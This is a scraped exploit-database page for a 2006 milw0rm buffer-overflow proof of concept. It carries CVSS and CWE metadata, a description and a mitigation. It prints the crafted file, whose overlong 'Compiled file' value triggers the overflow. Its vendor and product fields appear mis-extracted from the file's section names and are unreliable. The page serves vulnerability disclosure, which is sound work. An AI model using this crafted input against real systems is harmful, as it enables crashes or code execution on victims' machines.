header-logo
Suggest Exploit
vendor:
INFOTYPES
by:
milw0rm.com
7.5
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: INFOTYPES
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

OPTIONS

A buffer overflow vulnerability exists in the 'Compiled file' option of the 'OPTIONS' section of the INFOTYPES file. An attacker can exploit this vulnerability by supplying a specially crafted INFOTYPES file with a long string in the 'Compiled file' option, resulting in a buffer overflow.

Mitigation:

Ensure that the length of the 'Compiled file' option is properly validated before being processed.
Source

Exploit-DB raw data:

[OPTIONS]
Compatibility=1.1 or later
Compiled file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaUUUUr0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Display compile progress=No
Language=0x419 Ðóññêèé

[INFOTYPES]

# milw0rm.com [2006-02-10]

Navigation

Suggest Exploit

Services By CQR